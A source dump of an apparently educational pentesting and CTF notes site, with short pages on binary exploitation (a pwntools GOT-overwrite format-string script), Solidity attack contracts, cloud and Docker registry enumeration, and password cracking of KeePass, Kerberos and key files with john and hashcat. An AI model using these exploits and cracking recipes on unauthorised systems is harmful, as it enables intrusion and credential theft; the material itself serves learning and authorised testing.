10 | Exploit Notes are only for educational purpose or penetration testing, not attacking servers that you're not authorized.
11 | This site will not take any responsibility even if you attack the server illegally or cause damage unintentionally.
12 | Please use the contents at your own risk.
13 |
14 |
15 | The contents are not original, but based on the information on the internet, the author actually tried and functioned.
16 | Although the author strives to post the latest information on the content of this site as much as possible, there is no guarantee that it will always be new.
17 |
18 |
19 | I'm not a security expert, just an enthusiast, so the contents written are not necessarily accurate.
20 |
21 |
22 |
23 |
24 |
--------------------------------------------------------------------------------
/src/exploit/_data.yml:
--------------------------------------------------------------------------------
1 | type: exploit
2 | layout: layouts/exploit.vto
3 | date: Git Last Modified
--------------------------------------------------------------------------------
/src/exploit/audio/_data.yml:
--------------------------------------------------------------------------------
1 | category1: audio
2 | related_menus:
3 | - title: Audio
4 | id: others
--------------------------------------------------------------------------------
/src/exploit/audio/sstv.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: SSTV (Slow-scan Television)
3 | description: SSTV is a picture transmission method by amateur radio operators. We can extract pictures from audio files.
4 | tags:
5 | - Audio
6 | - Spectrogram
7 | refs:
8 | - https://oe5lxr.at/decode-sstv-with-mmsstv/
9 | date: 2023-07-19
10 | draft: false
11 | ---
12 |
13 | ## Decode SSTV
14 |
15 | There are some online tools available as below.
16 |
17 | - **MMSSTV** (for Windows)
18 | - **QSSTV** (for Linux)
19 | - **[sstv](https://github.com/colaclanth/sstv)** (Command-line tool)
--------------------------------------------------------------------------------
/src/exploit/binary-exploitation/_data.yml:
--------------------------------------------------------------------------------
1 | category1: binary-exploitation
2 | related_menus:
3 | - title: Method
4 | id: method
5 | - title: Cheatsheet
6 | id: cheatsheet
7 | - title: Binary Exploitation
8 | id: others
--------------------------------------------------------------------------------
/src/exploit/binary-exploitation/cheatsheet/_data.yml:
--------------------------------------------------------------------------------
1 | category2: cheatsheet
--------------------------------------------------------------------------------
/src/exploit/binary-exploitation/method/_data.yml:
--------------------------------------------------------------------------------
1 | category2: method
--------------------------------------------------------------------------------
/src/exploit/binary-exploitation/method/binary-exploitation-with-got.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Binary Exploitation with GOT
3 | description: GOT (Global Offset Table) is a section of a computer program’s memory used to enable computer program code compiled as an ELF file to run correctly.
4 | tags:
5 | - Reverse Engineering
6 | refs:
7 | date: 2023-02-12
8 | draft: false
9 | ---
10 |
11 | ## GOT Overriding
12 |
13 | ```python
14 | from pwn import *
15 |
16 | context.update(arch="amd64", os="linux")
17 |
18 | filepath = "./example"
19 |
20 | elf = context.binary = ELF(filepath)
21 |
22 | p = process(filepath) # p = remote('example.com', '1337')
23 |
24 | p.clean()
25 | p.sendline()
26 | p.clean()
27 |
28 | payload = fmtstr_payload(10, {elf.got['puts'] : elf.sym['holidays']})
29 | p.sendline(payload)
30 | p.interactive()
31 | ```
32 |
--------------------------------------------------------------------------------
/src/exploit/binary-exploitation/method/binary-exploitation-with-ret2plt.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Binary Exploitation with ret2plt
3 | description:
4 | tags:
5 | - Reverse Engineering
6 | refs:
7 | date: 2023-02-12
8 | draft: false
9 | ---
10 |
11 | No content yet.
--------------------------------------------------------------------------------
/src/exploit/binary-exploitation/method/binary-exploitation-with-time-guessing.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Binary Exploitation with Time Guessing
3 | description:
4 | tags:
5 | - Reverse Engineering
6 | refs:
7 | date: 2023-03-01
8 | draft: false
9 | ---
10 |
11 | ## Investigation
12 |
13 | ```bash
14 | ./example
15 |
16 | Guess the number: 1111
17 | You losed. The correct answer is 1475693029
18 |
19 | Guess the number: 12345678
20 | You losed. The correct answer is 8246712747
21 | ```
22 |
23 | If we find a binary that asks us to guess the correct time (or time-base number), we can bypass it using a Pipe in command line.
24 |
25 |
26 |
27 | ## Exploitation
28 |
29 | ```bash
30 | # tr -dc '0-9': Extract the correct number provided by the binary.
31 | echo 1234 | ./example | tr -dc '0-9' | ./example
32 | ```
33 |
34 | The above payload inputs ‘1234’ at first, then the binary returns the correct number. **`tr`** command extracts this number and passes it the second execution of the binary.
35 | As the binary depends on the time, so we can bypass the program by passing the previous answer instantly.
--------------------------------------------------------------------------------
/src/exploit/blockchain/_data.yaml:
--------------------------------------------------------------------------------
1 | category1: blockchain
2 | related_menus:
3 | - title: Smart Contract
4 | id: smart-contract
5 | - title: Others
6 | id: others
--------------------------------------------------------------------------------
/src/exploit/blockchain/blockchain-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Blockchain Pentesting
3 | description: A type of Digital Ledger Technology (DLT) that consists of growing list of records, called blocks, that are securely linked together using cryptography.
4 | tags:
5 | - Blockchain
6 | - Web3
7 | refs:
8 | date: 2023-10-11
9 | draft: false
10 | ---
11 |
12 | ## Explore Transactions
13 |
14 | - [blockchain.com](https://www.blockchain.com/explorer)
15 |
16 | The most popular and trusted block explorer and crypto transaction search engine.
17 |
18 | - [Block Explorer](https://blockexplorer.com/)
19 |
20 | The Handshake Block Explorer.
21 |
22 | - [etherchain.org](https://www.etherchain.org/)
23 |
24 | The Ethereum blockchain explorer.
25 |
26 | - [OXT](https://oxt.me/)
27 |
28 |
29 |
30 |
31 | ## Explore Wallets
32 |
33 | - [Wallet Explorer](https://www.walletexplorer.com/)
34 |
--------------------------------------------------------------------------------
/src/exploit/blockchain/smart-contract/_data.yaml:
--------------------------------------------------------------------------------
1 | category2: smart-contract
--------------------------------------------------------------------------------
/src/exploit/blockchain/smart-contract/solidity-contarct-address-recovery.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Solidity Contract Address Recovery
3 | description:
4 | tags:
5 | - Blockchain
6 | - Ethereum
7 | refs:
8 | - https://ethereum.stackexchange.com/questions/760/how-is-the-address-of-an-ethereum-contract-computed
9 | - https://blog.dixitaditya.com/ethernaut-level-17-recovery
10 | date: 2023-09-30
11 | draft: false
12 | ---
13 |
14 | ## Create a Contract for Recovery Address
15 |
16 | This contract can compute the contract address which has been lost.
17 |
18 | ```js
19 | // SPDX-License-Identifier: MIT
20 | pragma solidity ^0.8.0;
21 |
22 | contract ContractRecovery {
23 |
24 | constructor(address _creatorAddress) {
25 | address lostAddress = address(uint160(uint256(keccak256(abi.encodePacked(bytes1(0xd6), bytes1(0x94), address(_creatorAddress), bytes1(0x01))))));
26 | // some code here ...
27 | }
28 | }
29 | ```
30 |
31 | Another way is to use [Etherscan](https://etherscan.io/) transaction history.
--------------------------------------------------------------------------------
/src/exploit/blockchain/smart-contract/solidity-conversion.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Solidity Conversion
3 | description:
4 | tags:
5 | - Blockchain
6 | - Ethereum
7 | refs:
8 | - https://www.tutorialspoint.com/solidity/solidity_conversions.htm
9 | - https://coinsbench.com/12-privacy-ethernaut-explained-8ee480f303f2
10 | date: 2023-09-30
11 | draft: false
12 | ---
13 |
14 | ## Explicit Conversion
15 |
16 | When we cast a smaller type to a bigger type, there's no problem. However, when we cast a bigger type to a smaller type, data may be lost partially.
17 |
18 | ### Uint/Int
19 |
20 | ```js
21 | // uint32 -> uint16
22 | uint32 a = 0x12345678;
23 | uint16 b = uint16(a); // 0x5678
24 |
25 | // uint16 -> uint32
26 | uint16 a = 0x1234;
27 | uint32 b = uint32(a); // 0x00001234
28 | ```
29 |
30 | ### Bytes
31 |
32 | ```js
33 | // bytes2 -> bytes1
34 | bytes2 a = 0x1234;
35 | bytes1 b = bytes1(a); // 0x12
36 |
37 | // bytes2 -> bytes4
38 | bytes2 a = 0x1234;
39 | bytes4 b = bytes4(a); // 0x12340000
40 | ```
--------------------------------------------------------------------------------
/src/exploit/blockchain/smart-contract/solidity-denial-of-service-attack.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Solidity Denial of Service Attack
3 | description: We can denial the Solidity execution by consuming all gas using various ways.
4 | tags:
5 | - Blockchain
6 | - Ethereum
7 | refs:
8 | - https://coinsbench.com/20-denial-ethernaut-explained-92bc3f7562ec
9 | date: 2023-09-30
10 | draft: false
11 | ---
12 |
13 | ## DoS with Assembly Invalid Function
14 |
15 | The `invalid()` opcode in in-line assembly consumes all the gas and causes Dos for the contract.
16 |
17 | ```js
18 | // SPDX-License-Identifier: MIT
19 | pragma solidity ^0.8.0;
20 |
21 | contract Victim {
22 | address public owner;
23 | uint public balance;
24 |
25 | function withdrawUser(address _address) {
26 | (bool success, ) = _address.call{value: balance}("");
27 | // Some code ...
28 | }
29 | }
30 |
31 | contract Attack {
32 | Victim target;
33 |
34 | constructor(address _targetAddress) {
35 | target = Victim(_targetAddress);
36 | target.withdrawUser(address(this));
37 | }
38 |
39 | fallback() payable external {
40 | assembly {
41 | invalid()
42 | }
43 | }
44 | }
45 | ```
--------------------------------------------------------------------------------
/src/exploit/blockchain/smart-contract/solidity-overflow-and-underflow.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Solidity Overflow & Underflow
3 | description: Solidity is vulnerable to overflow and underflow of uint variables on the version <0.8.
4 | tags:
5 | - Blockchain
6 | - Ethereum
7 | refs:
8 | date: 2023-09-27
9 | draft: false
10 | ---
11 |
12 | ## Overflow
13 |
14 | ```js
15 | uint8 value = 255;
16 | value++;
17 | // Result: value = 0
18 | ```
19 |
20 |
21 |
22 | ## Underflow
23 |
24 | ```js
25 | uint8 value = 0;
26 | value--;
27 | // Result: value = 255
28 | ```
--------------------------------------------------------------------------------
/src/exploit/blockchain/smart-contract/solidity-self-destruct-attack.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Solidity Self Destruct Attack
3 | description: Solidity’s ‘selfdestruct’ function may be used to destruct a target contract and steal the balance by an attacker.
4 | tags:
5 | - Blockchain
6 | - Ethereum
7 | refs:
8 | date: 2023-09-30
9 | draft: false
10 | ---
11 |
12 | ## Create a Malicious Contract for Destructing Contract
13 |
14 | ```js
15 | // SPDX-License-Identifier: MIT
16 | pragma solidity ^0.4.0;
17 |
18 | contract Attack {
19 | function attack(address _address) payable public {
20 | // the remaining Ether sent to _address when destructing
21 | selfdestruct(_address);
22 | }
23 | }
24 | ```
25 |
--------------------------------------------------------------------------------
/src/exploit/blockchain/smart-contract/solidity-smart-contract-attack-methodology.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Solidity Smart Contract Attack Methodology
3 | description: When attacking target contract, we can create an attack contract which loads the target contract and abuse it.
4 | tags:
5 | - Blockchain
6 | - Ethereum
7 | refs:
8 | date: 2023-09-30
9 | draft: false
10 | ---
11 |
12 | ## Create an Attack Contract
13 |
14 | ```js
15 | // SPDX-License-Identifier: MIT
16 | pragma solidity ^0.8.0;
17 |
18 | // Define interface for victim contract
19 | interface IVictim {
20 | // Set the Victim contract functions
21 | function example1() external;
22 | function example2(uint) external;
23 | }
24 |
25 | // Define Attack contract to compromise the victim contract
26 | contract Attack {
27 | IVictim public victim;
28 |
29 | constructor(address _victimAddress) {
30 | // Initialize Victim contract (interface)
31 | victim = IVictim(_victimAddress);
32 | }
33 |
34 | // Create a function to be used for attacking the victim contract
35 | function attack() public {
36 | victim.example1();
37 | victim.example2(1);
38 | }
39 | }
40 | ```
--------------------------------------------------------------------------------
/src/exploit/cloud/_data.yml:
--------------------------------------------------------------------------------
1 | category1: cloud
2 | related_menus:
3 | - title: Others
4 | id: others
--------------------------------------------------------------------------------
/src/exploit/cloud/gcp-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: GCP (Google Cloud Platform) Pentesting
3 | description:
4 | tags:
5 | - Cloud
6 | refs:
7 | - https://pwnedlabs.io/labs/reveal-hidden-files-in-google-storage
8 | date: 2024-12-18
9 | draft: false
10 | ---
11 |
12 | ## Install Google Cloud CLI
13 |
14 | Before pentesting GCP, we need to install a dedicated CLI tool. See [the installation guide](https://cloud.google.com/sdk/docs/install) for details.
15 | After installed, login with your Google credential:
16 |
17 | ```bash
18 | gcloud auth login
19 | ```
20 |
21 |
22 |
23 | ## Google Storage
24 |
25 | Google Storage allows users to store static files in the URL: `https://storage.googleapis.com//`.
26 | We can enumerate the target storage as below:
27 |
28 | ```bash
29 | # Enumerate accessible directories/files from outside.
30 | fuzz -u https://storage.googleapis.com//FUZZ -w wordlist.txt -fc 403
31 |
32 | # Display directories/files
33 | gsutil ls gs:///example/
34 |
35 | # Download a file
36 | gsutil cp gs:///example.txt
37 |
38 | # Get information for the bucket
39 | gsutil stat gs:///index.html
40 | ```
--------------------------------------------------------------------------------
/src/exploit/container/_data.yml:
--------------------------------------------------------------------------------
1 | category1: container
2 | related_menus:
3 | - title: Docker
4 | id: docker
5 | - title: Kubernetes
6 | id: kubernetes
7 | - title: Others
8 | id: others
--------------------------------------------------------------------------------
/src/exploit/container/docker/_data.yml:
--------------------------------------------------------------------------------
1 | category2: docker
--------------------------------------------------------------------------------
/src/exploit/container/docker/docker-registry-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Docker Registry Pentesting
3 | description: Docker Registry is a steteless, highly scalable server side application that stores and lets you distribute Docker images. A default port is 5000.
4 | tags:
5 | - Container
6 | refs:
7 | - https://tbhaxor.com/exploiting-insecure-docker-registry/
8 | date: 2024-02-08
9 | draft: false
10 | ---
11 |
12 | ## Endpoints
13 |
14 | ```bash
15 | /v2/_catalog
16 | /v2//tags/list
17 | # We can download the manifest given tag.
18 | /v2//manifests/
19 | ```
20 |
21 |
22 |
23 | ## Extract Layers
24 |
25 | If we download the manifest with the above, see the content and blobsums (sha256:abcd...) in fsLayers.
26 |
27 | ```bash
28 | curl -so 1.tar https://example.com:5000/v2//blobs/sha256:abcd...
29 | tar -xvf 1.tar
30 | ```
31 |
32 | After extracting tar files, investigate files or directories to find the sensitive information.
--------------------------------------------------------------------------------
/src/exploit/container/kubernetes/_data.yml:
--------------------------------------------------------------------------------
1 | category2: kubernetes
--------------------------------------------------------------------------------
/src/exploit/cryptography/_data.yml:
--------------------------------------------------------------------------------
1 | category1: cryptography
2 | related_menus:
3 | - title: Algorithm
4 | id: algorithm
5 | - title: Key Derivation Function
6 | id: key-derivation-function
7 | - title: Tool
8 | id: tool
9 | - title: Math
10 | id: math
11 | - title: Bit Wise Operation
12 | id: bit-wise-operation
13 | - title: Conversion
14 | id: conversion
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/_data.yml:
--------------------------------------------------------------------------------
1 | category2: algorithm
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/atbash-cipher.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Atbash Cipher
3 | description: Atbash Cipher is a monoalphabetic substitution cipher originally used to encrypt the Hebrew alphabet.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-02-10
8 | draft: false
9 | ---
10 |
11 | ## Online Tools
12 |
13 | - **[Atbach Cipher Tool](https://www.boxentriq.com/code-breaking/atbash-cipher)**
14 |
15 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/caesar-cipher.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Caesar Cipher
3 | description: Caesar Cipher is one of the simplest and most widely konwn encryption techniques.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-02-10
8 | draft: false
9 | ---
10 |
11 | ## Online Tools
12 |
13 | - **[Caesar Cipher Encoder/Decoder](https://www.dcode.fr/caesar-cipher)**
14 |
15 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/camellia-cipher.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Camellia Cipher
3 | description: Camellia is a symmetric key block cipher with a block size of 128 bits and key sizes of 128, 192 and 256 bits.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-02-21
8 | draft: false
9 | ---
10 |
11 | ## Decrypt
12 |
13 | ```bash
14 | gpg --decrypt encrypted.gpg
15 | ```
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/ecc.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: ECC (Elliptic Curve Cryptography)
3 | description: Elliptic Curve Cryptography is an approach to public-key cryptography based on the algebraic structure of elliptic curves over finite fields.
4 | tags:
5 | - Cryptography
6 | refs:
7 | - https://en.wikipedia.org/wiki/Elliptic-curve_cryptography
8 | date: 2023-09-09
9 | draft: false
10 | ---
11 |
12 | *This article has few content yet.
13 |
14 | ## Formula
15 |
16 | ```python
17 | Y**2 = X**3 + a*X + b
18 | ```
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/ecdsa.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: ECDSA (Elliptic Curve Digital Signature Algorithm)
3 | description: ECDSA offers a variant of the DSA which uses elliptic curve cryptography.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-09-09
8 | draft: false
9 | ---
10 |
11 | ## ECDSA in Python
12 |
13 | [python-ecdsa](https://github.com/tlsfuzzer/python-ecdsa) can be used for ECDSA.
14 |
15 | ```bash
16 | pip install ecdsa
17 | ```
18 |
19 | ### Verifying
20 |
21 | ```python
22 | from ecdsa import SigningKey, NIST384p
23 |
24 | sk = SigningKey.generate(curve=NIST384p)
25 | vk = sk.verifying_key
26 | signature = sk.sign(b"message")
27 | print(vk.verify(signature, b"message"))
28 | ```
29 |
30 | ### Generating SigningKey
31 |
32 | ```python
33 | from ecdsa import SigningKey, NIST384p
34 |
35 | sk = SigningKey.generate(curve=NIST384p)
36 | sk_string = sk.to_string()
37 | print(sk_string.hex())
38 |
39 | sk2 = SigningKey.from_string(sk_string, curve=NIST384p)
40 | print(sk2.to_string().hex())
41 | ```
42 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/fernet.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Fernet
3 | description: Fernet is a symmetric encryption cryptography.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-03-07
8 | draft: false
9 | ---
10 |
11 | ## Decrypt
12 |
13 | There are many online tools such as…
14 |
15 | - [https://asecuritysite.com/tokens/ferdecode](https://asecuritysite.com/tokens/ferdecode)
16 | - [https://8gwifi.org/fernet.jsp](https://8gwifi.org/fernet.jsp)
17 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/hmac.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: HMAC
3 | description: An HMAC is a specific type of message authentication code involving a cryptographic hash function and a secret cryptographic key.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-02-10
8 | draft: false
9 | ---
10 |
11 | ## Install HMAC Commands
12 |
13 | If you don’t have `hmac256` command, you need to install the package.
14 |
15 | ```bash
16 | # In debian
17 | sudo apt install libgcrypt20-dev
18 | ```
19 |
20 |
21 |
22 | ## Decrypt
23 |
24 | ```bash
25 | # HMAC
26 | hmac256 example.txt
27 |
28 | # HMAC-SHA256
29 | sha256hmac example.txt --key
30 |
31 | # HMAC-SHA384
32 | sha384hmac example.txt --key
33 |
34 | # HMAC-SHA512
35 | sha512hmac example.txt --key
36 | ```
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/kdbx-files.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: KDBX Files
3 | description: A KDBX file is a password database created by KeePass Password Safe.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2024-10-25
8 | draft: false
9 | ---
10 |
11 | ## Open KDBX File
12 |
13 | If KeePass software does not exist in our system, run the following command.
14 |
15 | ```bash
16 | sudo apt install keepassx
17 | # or
18 | sudo apt install keepass2
19 | ```
20 |
21 | To open **KeePass*, run the following command.
22 |
23 | ```sh
24 | keepassx
25 | # or
26 | keepass2
27 | ```
28 |
29 | ### Copy Password
30 |
31 | Right-click on the password value then click **Copy Password**.
32 |
33 |
34 |
35 | ## Crack KDBX Password
36 |
37 | When opening KDBX file in KeePass if you’re asked the Master Key, you need to crack the password of the KDBX file. **John The Ripper** can be used to crack the password.
38 |
39 | ### 1. Convert to Hash
40 |
41 | ```sh
42 | keepass2john example.kdbx > hash.txt
43 | ```
44 |
45 | ### 2. Crack the Hash
46 |
47 | ```sh
48 | john --wordlist=wordlist.txt hash.txt
49 | # or
50 | hashcat -m 13400 -a 0 hash.txt wordlist.txt
51 | ```
52 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/kerberos-tgt-cracking.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Kerberos TGT Cracking
3 | description: The Kerberos Ticket-Granting Ticket (TGT) is created by the Kerberos authentication. Users can access to the network using these tickets. These are often saved as `.kirbi` extension and we may be able to crack them.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-11-11
8 | draft: false
9 | ---
10 |
11 | ## Crack TGT
12 |
13 | First convert the TGT to the hash which can be cracked by **John The Ripper**.
14 |
15 | ```sh
16 | kirbi2john tgt.kirbi > hash.txt
17 | # or
18 | python2 /usr/share/john/kirbi2john.py tgt.kirbi > hash.txt
19 | ```
20 |
21 | Then crack.
22 |
23 | ```sh
24 | john --wordlist=wordlist.txt hash.txt
25 | ```
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/length-extension-attack.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Length Extension Attack
3 | description:
4 | tags:
5 | - Cryptography
6 | refs:
7 | - https://en.wikipedia.org/wiki/Length_extension_attack
8 | - https://github.com/iagox86/hash_extender
9 | date: 2023-07-28
10 | draft: false
11 | ---
12 |
13 | ## Exploitation
14 |
15 | We can exploit the vulnerability with [hash_extender](https://github.com/iagox86/hash_extender).
16 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/md4-md5.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: MD4, MD5
3 | description: MD4 and MD5 (message-digest) is a widely used hash function producing a 128-bit hash value.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-01-05
8 | draft: false
9 | ---
10 |
11 | ## Online Tools
12 |
13 | - **[MD5 Center](https://md5.gromweb.com/)**
14 | - **[CrackStation](https://crackstation.net/)**
15 | - **[Hashes.com](https://hashes.com/en/decrypt/hash)**
16 |
17 |
18 |
19 | ## Decrypt
20 |
21 | ### MD4
22 |
23 | Put the md4 hash into the file.
24 |
25 | ```sh
26 | echo -n '' > hash.txt
27 | ```
28 |
29 | Then crack it.
30 |
31 | ```sh
32 | john --format=raw-md4 --wordlist=wordlist.txt hash.txt
33 | # or
34 | hashcat -m 900 -a 0 hash.txt wordlist.txt
35 | ```
36 |
37 | ### MD5
38 |
39 | Put the md5 hash into the file.
40 |
41 | ```sh
42 | echo -n '' > hash.txt
43 | ```
44 |
45 | Then crack it.
46 |
47 | ```sh
48 | john --format=raw-md5 --wordlist=wordlist.txt hash.txt
49 | # or
50 | hashcat -m 0 -a 0 hash.txt wordlist.txt
51 | ```
52 |
53 |
54 |
55 | ## Encrypt
56 |
57 | ### MD4
58 |
59 | No contents yet
60 |
61 | ### MD5
62 |
63 | ```sh
64 | echo -n 'hello' | md5sum
65 | md5sum sample.txt
66 | ```
67 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/multi-tap-cipher.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Multi-Tap Cipher
3 | description: Multi-Tap refers to a text entry system for mobile phones.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-02-21
8 | draft: false
9 | ---
10 |
11 | ## Online Tools
12 |
13 | - **[Multitap Decoder](https://www.dcode.fr/multitap-abc-cipher)**
14 |
15 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/pem.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: PEM (Privacy Enhanced Mail)
3 | description: PEM uses RSA encryption.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2022-12-01
8 | draft: false
9 | ---
10 |
11 | ## Decrypt
12 |
13 | First of all, you need to format the PEM file to make the John to recognize it.
14 |
15 | ```sh
16 | pem2john example.pem > hash.txt
17 | ```
18 |
19 | Crack the hash.
20 |
21 | ```sh
22 | john --wordlist=wordlist.txt hash.txt
23 | ```
24 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/pgp.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: PGP (Pretty Good Privacy)
3 | description: PGP is an encryption program that provides cryptographic privacy and authentication for data communication.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2022-12-20
8 | draft: false
9 | ---
10 |
11 | ## Decrypt
12 |
13 | First off, you need to format the private key to make the John to recognize it.
14 |
15 | ```sh
16 | gpg2john private.key > hash.txt
17 | ```
18 |
19 | Crack the passphrase using John the Ripper.
20 |
21 | ```sh
22 | john --wordlist=wordlist.txt hash.txt
23 | ```
24 |
25 |
26 |
27 | ## Decode Public Key
28 |
29 | There are some online tools.
30 |
31 | - **[PGPDump](https://8gwifi.org/pgpdump.jsp)**
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/pkcs.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: PKCS (Public-Key Cryptography Standards)
3 | description: PKCS are a group of public-key cryptography standards.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2022-12-01
8 | draft: false
9 | ---
10 |
11 | ## Decrypt
12 |
13 | ### PKCS#12
14 |
15 | First of all, you need to format the PKCS file to make the John to recognize it.
16 |
17 | ```sh
18 | pfx2john example.pfx > hash.txt
19 | ```
20 |
21 | Crack the password using the formatted text.
22 |
23 | ```sh
24 | john --wordlist=wordlist.txt hash.txt
25 | ```
26 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/rar.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: RAR (Roshal Archive)
3 | description: RAR is a proprietary archive file format that supports data compression, error correction and file spanning.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2022-12-22
8 | draft: false
9 | ---
10 |
11 | ## Decrypt
12 |
13 | First of all, you need to format the RAR file to make the John to recognize it.
14 |
15 | ```sh
16 | rar2john example.rar > hash.txt
17 | ```
18 |
19 | Crack the password using the formatted text.
20 |
21 | ```sh
22 | john --wordlist=wordlist.txt hash.txt
23 | ```
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/ripemd.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: RIPEMD
3 | description: RIPEMD (RIPE Message Digest) is a family of cryptographic hash function developed in 1992.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-03-07
8 | draft: false
9 | ---
10 |
11 | ## Decrypt
12 |
13 | There are many online tools for decryption RIPEMD. For example,
14 |
15 | - [https://gchq.github.io/CyberChef/#recipe=RIPEMD('320')](https://gchq.github.io/CyberChef/#recipe=RIPEMD('320'))
16 | - [https://md5hashing.net/hash/ripemd160](https://md5hashing.net/hash/ripemd160)
17 |
18 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/rot13-rot47.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: ROT13, ROT47
3 | description: ROT13 (rotate by 13 places), ROT47 (rotate by 47 places) are simple letter substitution ciphers.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2022-12-22
8 | draft: false
9 | ---
10 |
11 | ## Decode
12 |
13 | **[CyberChef](https://gchq.github.io/CyberChef/)** is useful online tools to decode ROT13, ROT47.
14 |
15 |
16 |
17 | ## Encode
18 |
19 | ### ROT13
20 |
21 | ```sh
22 | echo hello | tr 'A-Za-z' 'N-ZA-Mn-za-m'
23 | ```
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/transposition-cipher.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Transposition Cipher
3 | description: Transposition Cipher is a method of encryption which scrambles the positions of characters without changing the characters themselves.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-02-21
8 | draft: false
9 | ---
10 |
11 | ## Decode
12 |
13 | - **[Online Decoder](https://www.dcode.fr/transposition-cipher)**
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/vigenere-cipher.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Vigenere Cipher
3 | description: Vigenere Cipher is a method of encrypting alphabetic text by using a series of interwoven Caesar ciphers, based on the letters of a keyword.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-03-28
8 | draft: false
9 | ---
10 |
11 | ## Online Tools
12 |
13 | - **[CyberChef](https://gchq.github.io/CyberChef/#recipe=Vigen%C3%A8re_Decode(''))**
14 | - **[Vigenere Cipher Encoder/Decoder](https://www.dcode.fr/vigenere-cipher)**
15 | - **[Vigenere Solver](https://www.guballa.de/vigenere-solver)**
16 |
17 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/bit-wise-operation/_data.yml:
--------------------------------------------------------------------------------
1 | category2: bit-wise-operation
--------------------------------------------------------------------------------
/src/exploit/cryptography/bit-wise-operation/and-bitwise-operations.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: AND Bitwise Operations
3 | description:
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-08-29
8 | draft: false
9 | ---
10 |
11 | ## Basic
12 |
13 | We can do the **AND** operations using **`&`** operator.
14 |
15 | ```python
16 | 24 & 72
17 | 0x18 & 0x48
18 | # 8
19 |
20 | # Binary representation
21 | bin(24 & 72)
22 | # '0b1000'
23 | ```
24 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/bit-wise-operation/or-bitwise-operations.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: OR Bitwise Operations
3 | description:
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-08-29
8 | draft: false
9 | ---
10 |
11 | ## Basic
12 |
13 | Assume we want to **OR** operation **0100** and **1001**.
14 |
15 | ```python
16 | 0100
17 | # OR
18 | 1001
19 |
20 | # Result: 1101
21 | ```
22 |
23 | We can do that using **`|`** operator in Python.
24 |
25 | ```python
26 | 0b0100 | 0b1001
27 | # 13 ('1101' in binary)
28 |
29 | 4 | 9
30 | # 13 ('1101' in binary)
31 |
32 | # Binary representation
